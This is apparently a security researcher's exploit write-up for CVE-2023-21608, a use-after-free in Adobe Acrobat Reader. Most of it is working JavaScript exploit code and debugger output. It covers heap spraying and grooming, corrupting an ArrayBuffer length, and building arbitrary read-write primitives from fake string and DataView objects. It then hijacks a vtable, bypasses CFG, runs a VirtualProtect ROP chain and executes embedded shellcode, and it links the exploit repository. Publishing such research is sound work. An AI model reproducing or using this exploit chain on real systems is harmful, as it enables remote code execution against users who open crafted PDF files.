Strategy

Spray a lot of ArrayBuffer to get allocation at a predictable address like 0x20000048
Grom LFH with our specified pattern to corrupt the ArrayBuffer at a predictable address
Trigger the vulnerability to use the freed buffer and corrupt the ArrayBuffer length
Use corrupted ArrayBuffer to create a fake string to achieve arbitrary read primitive
Use arbitrary read from fake string to create fake DataView to achieve arbitrary read-write primitives
Corrupt field's virtual table to hijack execution control
Bypass CFG
Execute shellcode
Restore corrupted objects and recover cleanly

Spraying ArrayBuffer

var SPRAY = [];

for(var i=0; i<0x2000; i++) {
  SPRAY[i] = new ArrayBuffer(0x10000-24);
  const typedArray = new Uint32Array(SPRAY[i]);
  typedArray[0] = 0x41424344;
  typedArray[1] = 0x41424344;
}

Using the above script we can have an ArrayBuffer allocated at a predictable address such as 0x20000058.

Locating ArrayBuffer

By using magic markers, we can locate the buffer in heap memory which helps to find the constructor which allocates the ArrayBuffer in Adobe Reader.

Note: Allocation of ArrayBuffer happens in EScript.api code.

For example, when allocating an ArrayBuffer of size 0x1020, searching memory for the magic marker and identifying who allocated the memory can help us find the ArrayBuffer constructor.

0:015> s -d 0 L?0xffffffff 0x41424344
0x4ef0cc00  41424344 45464748 00000000 00000000  DCBAHGFE........

0:015> !ext.heap -p -a 0x4ef0cc00
    address 4ef0cc00 found in
    _DPH_HEAP_ROOT @ 9521000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                4eed11a0:         4ef0cbf0              410 -         4ef0c000             2000
    6ddea8b0 verifier!AVrfDebugPageHeapAllocate+0x00000240
    7714ef0e ntdll!RtlDebugAllocateHeap+0x00000039
    770b6150 ntdll!RtlpAllocateHeap+0x000000f0
    770b57fe ntdll!RtlpAllocateHeapInternal+0x000003ee
    770b53fe ntdll!RtlAllocateHeap+0x0000003e
    767919c7 ucrtbase!_calloc_base+0x00000037
    69481bd5 EScript!sub_10011BAE+0x00000027
    695a15ce EScript!sub_1013153C+0x00000092
    695a1a4e EScript!sub_10131A2C+0x00000022
    695a4bce EScript!sub_10134B68+0x00000066
    695a1d75 EScript!sub_10131D10+0x00000065
    694a95b0 EScript!sub_100394E9+0x000000c7
    694a3505 EScript!js_Interpret+0x00001056
    694a246b EScript!sub_10032412+0x00000059
    694a237b EScript!sub_10032315+0x00000066
    694a22b0 EScript!js_Execute+0x0000007d
    6948b6b0 EScript!JS_EvaluateUCScriptForPrincipals+0x0000008b
    694ca9c6 EScript!JS_EvaluateUCScript+0x0000004d
    694ca6cb EScript!ESExecScript+0x0000010b

Verifying the ArrayBuffer backing memory (array buffer chunk + header size (0x10)).

0:015> ? 410
Evaluate expression: 1040 = 00000410
0:015> ? 4ef0cc00 - 4ef0cbf0
Evaluate expression: 16 = 00000010
0:015> dc 4ef0cbf0
4ef0cbf0  00000000 00000400 3cc31450 00000000  ........P..<....  +0x4: length, +0x8: typed array ptr
4ef0cc00  41424344 45464748 00000000 00000000  DCBAHGFE........ contents starts here
4ef0cc10  00000000 00000000 00000000 00000000  ................
4ef0cc20  00000000 00000000 00000000 00000000  ................
4ef0cc30  00000000 00000000 00000000 00000000  ................
4ef0cc40  00000000 00000000 00000000 00000000  ................
4ef0cc50  00000000 00000000 00000000 00000000  ................
4ef0cc60  00000000 00000000 00000000 00000000  ................
0:015> ? 0x400
Evaluate expression: 1024 = 00000400

By using a WinDbg breakpoint on the constructor code, we can find the addresses where ArrayBuffer is being allocated.

bp Escript+0x131a4e ".printf \"[ArrayBuffer alloc] %p \\n\", eax; gc"

Now, let's see how the actual ArrayBuffer spray looks like in the exploit.

function sprayArrBuffers()
{
  for (var i=0; i<0x1500; i++)
  {
    bufs[i] = new ArrayBuffer(ALLOC_SIZE);
    const uintArr = new Uint32Array(bufs[i]);
    for (var k =0; k<16; k++) 
    {
      uintArr[k] = 0x33333333;
    }
    uintArr[0] = arrBufPtr + 8; //first deref a = *ecx
    uintArr[1] = 0x41424344; //map size
    uintArr[2] = 0x41424344;
    uintArr[3] = ARR_BUF_BASE - 4;

    // fake string for arbitrary read
    uintArr[FAKE_STR_START] = 0x102; //type
    uintArr[FAKE_STR_START+1] = arrBufPtr+0x40; // buffer
    uintArr[FAKE_STR_START+2] = 0x4;
    uintArr[FAKE_STR_START+3]= 0x4;

    // fake dataview for arbitrary write
    uintArr[FAKE_DV_START] = 0x77777777;
    delete uintArr;
    uintArr = null;
  }

  for (var i=0; i<0x10; i++)
  {
    arrs[i] = new Array(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 1,2, 3, 4, 5, 6, 7, 8, 9, 10, 11,12,13, 14, 15, 17,18, 19, 20, 21, 22, 23, 24, 25, 20, 21, 22, 23, 24, 25, 20, 21, 22, 23, 24, 25, 20, 21, 22, 23, 24, 25, 20, 21, 22, 23, 24, 25,20,21,22,23);
    arrs[i][0] = 0x47484950;
    arrs[i][1] = targetStr;
    arrs[i][2] = targetDV;
    for (var k=3; k<5000; k++)
    {
      arrs[i][k] = 0x50515051;
    }
  }
}

ArrayBuffer allocation on predictable address 0x20000048 is successful

0:011> dc 0x20000048
20000048  00000000 0000ffe8 135c4348 00000000  ........HC\..... +0x4: length, +0x8: typed array
20000058  20000060 00000000 00000000 20000044  `.. ........D.. 
20000068  33333333 33333333 33333333 33333333  3333333333333333
20000078  33333333 33333333 33333333 33333333  3333333333333333
20000088  33333333 33333333 33333333 33333333  3333333333333333
20000098  00000000 00000000 00000000 00000000  ................
200000a8  00000000 00000000 00000000 00000000  ................
200000b8  00000000 00000000 00000000 00000000  ................

By using heap grooming with our predictable address pattern and triggering the vulnerability, we can see that the ArrayBuffer length is corrupted/modified.

// encoding %u0058%u2000% at offset required by vulnerability
const code =
  "%u4141%u4242%u4343%u4444%u4545%u4646%u4747%u4848%u4949%u4a4a%u4b4b%u4c4c%u4d4d%u4e4e%u4f4f%u5050%u0058%u2000%u5353%u5454%u5555%u5656%u5757%u5858%u5959%u5a5a%u5b5b%u5c5c%u5d5d%u5e5e%u5f5f%u6060%u6161%u6262%u6363%u6464%u6565%u6666%u6767%u6868%u6969%u6a6a%u6b6b%u6c6c%u6d6d%u6e6e%u6f6f%u7070%u7171%u7272%u7373%u7474%u7575%u7676%u7777%u7878%u7979%u7a7a%u7b7b%u7c7c%u7d7d%u7e7e%u7f7f%u8080%u8181%u8282%u8383%u8484";

0:023> dc 20000048
20000048  00000000 247c3308 243722f0 00000000  .....3|$."7$.... +0x4: length, +0x8: typed array
20000058  20000060 00000000 00000000 20000044  `.. ........D.. 
20000068  33333333 33333333 33333333 33333333  3333333333333333
20000078  33333333 33333333 33333333 33333333  3333333333333333
20000088  33333333 33333333 33333333 33333333  3333333333333333
20000098  00000000 00000000 00000000 00000000  ................
200000a8  00000000 00000000 00000000 00000000  ................
200000b8  00000000 00000000 00000000 00000000  ................

The length of the ArrayBuffer is corrupted by a pointer value, allowing for relative out-of-bounds read-write on the heap.

Once the vulnerability is triggered, the corrupted ArrayBuffer can be located using the below-given code.

for (var i=0; i<bufs.length; i++)
{
  if (bufs[i].byteLength != ALLOC_SIZE)
  {
    console.println("[+] corrupted array buffer found at " + i + " : length: " + bufs[i].byteLength + " : buf length: " + bufs.length);
    ...
  }
}

Out-of-bounds to Arbitrary Read-Write Primitives

Once out-of-bounds read-write primitives are achieved on the ArrayBuffer, the second JavaScript Array is used to create the addrOf primitive. To be able to read-write from Array, a set of Arrays of length similar to ArrayBuffer are sprayed so that the allocations of the Array land just after ArrayBuffer spray as shown below.

-------------------------------------------------------------------------------
|        |        |        |         |        |   |       |       |   |       |
|arrbuf_1|arrbuf_2|arrbuf_3|.........|arrbuf_n|...|array_1|array_2|...|array_n|
|        |        |        |         |        |   |       |       |   |       |
-------------------------------------------------------------------------------

With ArrayBuffer out-of-bounds access, we can find the start of the first Array and use it to further create another set of primitives.

addrOf

leak address of any JavaScript object

poi

leak value at a given address (this initial form of AAR is required to create full AAR/AAW)

AAR

read the arbitrary value at a given address

AAW

write value at a given address

Spraying large Array

We need to allocate a few large Array just after our sprayed ArrayBuffer
Once we corrupt the length of the ArrayBuffer we can locate this Array and corrupt the adjacent Array for arbitrary read-write primitives
However, the JavaScript Array reallocations seem to be growing in a certain pattern when we tried to add large elements in the loop to the Array

for(var k = 0; k<N; k++) {
  _arr_.push(0x41414141);
}

After some testing, we observed that the reallocation length can be partially controlled by allocating Array with initial contents

// initial contents are ajusted after testing few iterations
// to be maximum enough to be allocated just after sprayed ArrayBuffer
var _arr_ = new Array(1, 2, 3, 4);

Controlled Array Spraying

Array with initializer should start with the allocation of 0x003f0
Further, elements initialization inside for loop should increase the allocation sizes using reallocs
Increment of Array length happens as: 0x003f0 -> 0x007d0 -> 0x00f90 -> 0x01f10 -> 0x03e10 -> 0x07c10 -> 0x0f810
Re-allocations with size 0x0f810 should land the Array allocations just after the last ArrayBuffer from our spray
When we read out-of-bound from a corrupted ArrayBuffer, we should be able to read the contents of the sprayed Array

for (var i = 0; i < 0x10; i++) {
  arrayRefs[i] = new Array(
    1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
    21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
    41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60,
    61, 62
  );
  arrayRefs[i][0] = 0x47484950;
  arrayRefs[i][1] = targetStr;       // string object, we use for arbitrary read
  arrayRefs[i][2] = targetDataView;  // DataView we use for crafting AAR/AAW

  for (var k = 3; k < 5000; k++) {
    arrayRefs[i][k] = 0x50515051;
  }
}

The final Array allocation should look as given below.

EScript!sub_1004DBA9+0xa4:
6a41dc4d 8bf8            mov     edi,eax
0:000> g
24188270  00000000 00000f80 00000f80 00000f80  ................
24188280  47484950 ffffff81 0db3c420 ffffff85  PIHG.... .......
24188290  0dda27c0 ffffff87 50515051 ffffff81  .'......QPQP.... 
241882a0  50515051 ffffff81 50515051 ffffff81  QPQP....QPQP....
241882b0  50515051 ffffff81 50515051 ffffff81  QPQP....QPQP....
241882c0  50515051 ffffff81 50515051 ffffff81  QPQP....QPQP....
241882d0  50515051 ffffff81 50515051 ffffff81  QPQP....QPQP....
241882e0  50515051 ffffff81 50515051 ffffff81  QPQP....QPQP....

0:015> !ext.heap -p -a 24188270
    address 24188270 found in
    _HEAP @ 4f10000
      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
        24188268 1f03 0000  [00]   24188270    0f810 - (busy)

Where 0db3c420 ffffff85 is targetStr and 0dda27c0 ffffff87 is targetDataView.

addrOf Primitive

The addrOf primitive allows us to leak the address of any JavaScript object by reading the address of the object stored in a sprayed Array using out-of-bounds primitives. The corruptedTypedArr is a typed array with a corrupted ArrayBuffer length, and arrStart is the index where the JavaScript Array is located from the start of the corrupted ArrayBuffer. The modified_arr is the JavaScript Array from the sprayed Arrays that we will use for corruption and address leakage.

function addrOf(obj)
{
  modified_arr[0] = obj;
  addr = corruptedTypedArr[arrStart+4];
  return addr;
}

Temporary Arbitrary Read Primitive

poi primitive allows us to read the value at an arbitrary address.

To achieve poi primitive, we need to perform a few steps:

Allocate a string in global scope like var targetStr = "Hello";
Spray the above string object as an element in sprayed arrays arrs[i][1] = targetStr;
Spray fake string structure inside sprayed ArrayBuffer

uintArr[FAKE_STR_START] = 0x102; // type
uintArr[FAKE_STR_START+1] = arrBufPtr+0x40; // buffer

Once out-of-bounds primitives are achieved, we assign the fake string to the address of sprayed string object from array uintArr[arrStart+6] = FAKE_STR;.
Now, targetStr which was sprayed along with Array can be confused with fake string.
Reading values from the given arbitrary address are achieved by setting addr to the backing buffer pointer of the fake string and then normally reading the targetStr object of our modified Array. This will allow us to read values from arbitrary addresses.

function s2h(s) {
  var n1 = s.charCodeAt(0)
  var n2 = s.charCodeAt(1)
  return ((n2<<16) | n1) >>> 0
}

function poi(addr)
{
  // leak values at addr by setting it to string pointer
  corruptedTypedArr[FAKE_STR_START+1] = addr;
  val = s2h(modified_arr[1]);
  return val;
}

Arbitrary Read-Write Primitives

Once we achieve out-of-bounds read-write on the ArrayBuffer, we can use the addrOf and poi primitives to perform arbitrary reads. With these primitives, we can derive full arbitrary read-write primitives by using the JavaScript DataView object.

To create arbitrary read-write primitives using a DataView object, we can follow these steps:

Create a DataView object with a valid ArrayBuffer and set an initial value for it:

var targetDV  = new DataView(new ArrayBuffer(0x64));
targetDV.setUint32(0, 0x55555555, true);

Spray the targetDV object as an element in an Array of sprayed Arrays:

for (var i=0; i<0x10; i++)
{
  ...
  arrs[i][2] = targetDV;
  ...
}

Create a fake DataView object by spraying an ArrayBuffer and setting a magic number value at the start of the spray.

uintArr[FAKE_DV_START] = 0x77777777;

Once out-of-bounds primitives are achieved, assign the fake DataView object to the address of the sprayed DataView object.

uintArr[arrStart + 8] = FAKE_DV;

Clone the contents of the valid DataView object into the fake DataView using the previously constructed primitives.

var targetDVPtr = addrOf(targetDV);

for (var k=0; k<32; k++)
{
  corruptedTypedArr[FAKE_DV_START + k] = poi(targetDVPtr + (k * 4));
}

Finally, to perform arbitrary read-write, set up the fake DataView object's backing ArrayBuffer pointer and read/write from the DataView object.

function AAR(addr)
{
  corruptedTypedArr[FAKE_DV_START + 20] = addr;
  return modified_arr[2].getUint32(0, true);
}

function AAW(addr, value)
{
  corruptedTypedArr[FAKE_DV_START + 20] = addr;
  modified_arr[2].setUint32(0, value, true);
}

Shellcode Execution

To execute shellcode, we use the arbitrary read-write (AAR/AAW) primitives to bypass ASLR and CFG.

The steps are as follows:

Bypass ASLR by leaking the AcroForm.api base address from the field object

var AcroFormApiBase = AAR(AAR(addrOf(testField) + 0x10) + 0x34) - 0x00293fe0

Leak the address of the field vtable

var fieldVtblAddr = AAR(AAR(AAR(AAR(addrOf(testField) + 0x10) + 0x10) + 0xc) + 4)
var fieldVtbl = AAR(fieldVtblAddr)

Clone the vtable into the heap (cloning is necessary as we do not have the write permission on the vtable address). We clone it to our chosen heap address (picked from the ArrayBuffer spray) and make further modifications there.

for(var i=0; i < 32; i++) {
  AAW(arrBufPtr + 0x100 + (i * 4), AAR(fieldVtbl + i * 4));
}

Perform stack pivoting into our controlled heap for shellcode execution. We prepare a fake stack on the heap with the necessary details as shown below:

AAW(arrBufPtr+0x100+0x48, AcroFormApiBase+0x6faa60);  // CFG gadget = AcroForm!sub_20EFAA60;
AAW(arrBufPtr+0x100+0x30, AcroFormApiBase+0x256984);  // 0x6b5e6984: mov esp, eax; dec ecx; ret;
AAW(arrBufPtr+0x100, AcroFormApiBase+0x1e646);        // 0x6b3ae646: pop esp; ret;
AAW(arrBufPtr+0x100+4, arrBufPtr+0x300);              // our pivoted stack
AAW(fieldVtblAddr, arrBufPtr+0x100);                  // field vtable

Set up ROP and execute the shellcode

var rop = [
  AAR(AcroFormApiBase+0x007da108),  // virtualprotect
  arrBufPtr+0x400,                  // return address
  arrBufPtr+0x400,                  // buffer
  0x1000,                           // sz
  0x40,                             // new protect
  arrBufPtr+0x340
];

for(var i=0; i < rop.length; i++) {
  AAW(arrBufPtr + 0x300 + 4 * i, rop[i]);
}

var shellcode = [ 0x90909090,
  835867240, 1667329123, 1415139921, 1686860336, 2339769483,
  1980542347, 814448152, 2338274443, 1545566347, 1948196865,
  4270543903, 605009708, 390218413, 2168194903, 1768834421,
  4035671071, 469892611, 1018101719, 2425393296 ];

for(var i=0; i < shellcode.length; i++) {
  AAW(arrBufPtr+0x400+i*4, re(shellcode[i]));
}

Finally, invoke the shellcode by calling the defaultValue property on the testField object.

var ret = testField.defaultValue;

Control Flow Guard (CFG) Bypass

Adobe Acrobat Reader has CFG enabled by default, so it is not possible to call the shellcode directly. Previous versions of exploits relied on using non-CFG modules within Adobe Reader to create the ROP chain, but newer versions have all modules CFG enabled.

One way to bypass this is to use the call sites that are not CFG instrumented. We found multiple non-CFG instrumented call sites that could be used to bypass CFG in Adobe Acrobat Reader. One of these functions is sub_20EFAA60, which allows us to call an address that we control by storing it in the ecx register.

.text:20EFAA60 ; int __thiscall sub_20EFAA60(void *this)
.text:20EFAA60 sub_20EFAA60    proc near               ; DATA XREF: .rdata:20FF8C11↓o
.text:20EFAA60                                         ; .rdata:21131674↓o ...
.text:20EFAA60                 mov     eax, [ecx]
.text:20EFAA62                 push    0Dh
.text:20EFAA64                 call    dword ptr [eax+30h]
.text:20EFAA67                 retn
.text:20EFAA67 sub_20EFAA60    endp

This can be used to control the program's execution and execute the shellcode.

Context Restoration and Recovery

After running the shellcode, the Acrobat Reader crashes because the relevant context has not been restored. To make the Adobe Acrobat Reader continue running after exploitation, it is important to restore this context.

This involves several steps:

Restoring targetStr and targetDV using the fake string and DataView that were created earlier
Restoring the original vtable that was hijacked for code execution
Fixing any corruption caused by the ArrayBuffer corruption and other side effects of this corruption
Restoring the stack (this is done in the shellcode recovery part)
Restoring ESP to its default value (this is also done in the shellcode recovery part)
Backing up original values before corruption so they can be restored once the shellcode is executed (this is shown in the below snippet)

The below snippet shows how some of the original values are backed up before corruption so they can be restored once the shellcode has been executed.

log("[+] Storing recovery context");

AAW(FAKE_STACK_PTR + 0x60, fieldVtblAddr);                // original vtable ptr (goes back in ECX)
AAW(FAKE_STACK_PTR + 0x64, fieldVtbl);                    // vtable funcs ptr
AAW(FAKE_STACK_PTR + 0x68, originalDefaultValFunc);       // original defaultVal impl to jump to
AAW(FAKE_STACK_PTR + 0x6c, AAR(ARRAY_BUFFER_BASE + 8));   // corrupted ArrayBuffer typed array ptr
AAW(FAKE_STACK_PTR + 0x70, AAR(ARR_BUF_MALLOC_BASE));     // malloc header 0
AAW(FAKE_STACK_PTR + 0x74, AAR(ARR_BUF_MALLOC_BASE + 4)); // malloc header 1

Exploit Log

[+] Acrobat Reader Remote Code Execution
    [*] Version: 21.01120039
[+] Spraying ArrayBuffer of size: 0xffe8
[+] Grooming LFH blocks of size: 68 count: 4000
[+] Triggering garbage collection
[+] Triggering vulnerability
[+] Finding required objects
    [*] Corrupted ArrayBuffer idx: 4604 byteLength: 0x24043250
    [*] addrOf Array start idx: 13221884
    [*] addrOf Array idx: 0
[+] Gaining arbitrary read & write primitive
    [*] Crafting fake DataView: 0x200001d8
[+] Fixing corrupted objects
    [*] Typed array pointer
    [*] Typed array node pointers
    [*] V1 Idx: 4602 address: 0x131cf240 value: 0xd0b8600 correct value: 0xd0b86a0
    [*] ArrayBuffer field
    [*] Fake string
[+] Finding required modules
    [*] AcroForm.api: 0x6ef70000
    [*] KERNEL32.dll: 0x769a0000
    [*] VirtualProtect: 0x769c04c0
[+] Finding gadgets in AcroForm.api
    [*] CFG bypass gadget: 0x6f66aa60
    [+] Stack pivot gadgets
        [*] xchg eax, esp; ret: 0x6ef8e5e6
        [*] pop esp; ret: 0x6ef8e646
[+] Setting up ROP and shellcode
    [*] Payload: 0x2459edd8
[^] Executing payload
[+] Exploit duration: 6.172 seconds

64-bit Exploitation

The CVE-2023-21608 bug also affected the 64-bit version of the Adobe Reader. We evaluated the possibility of exploiting this bug on the 64-bit version.

However, we stumbled upon 2 major issues:

The heap spraying is no longer possible in 64-bit address space. Hence, we could no longer rely on ArrayBuffer spraying technique outlined above to allocate controlled data at predictable addresses. We now need a separate info-leak bug for further exploitation.
But finding an info-leak is not a difficult task. The core problem that makes this bug useless for 64-bit exploitation is that the sprayed strings are used as aggregation objects, where new strings are created from the sprayed string. While creating a new string the standard C null terminators are considered. We can't use any addresses which have two consecutive NULL bytes in them. This will stop the string copy and we will never be able to re-allocate the freed memory with a controlled chunk that has the leaked ArrayBuffer address in it. The bug would no longer be effective and reproducible. This limits us from the possibility of exploiting this bug on the 64-bit version.

Exploit Repository

https://github.com/hacksysteam/CVE-2023-21608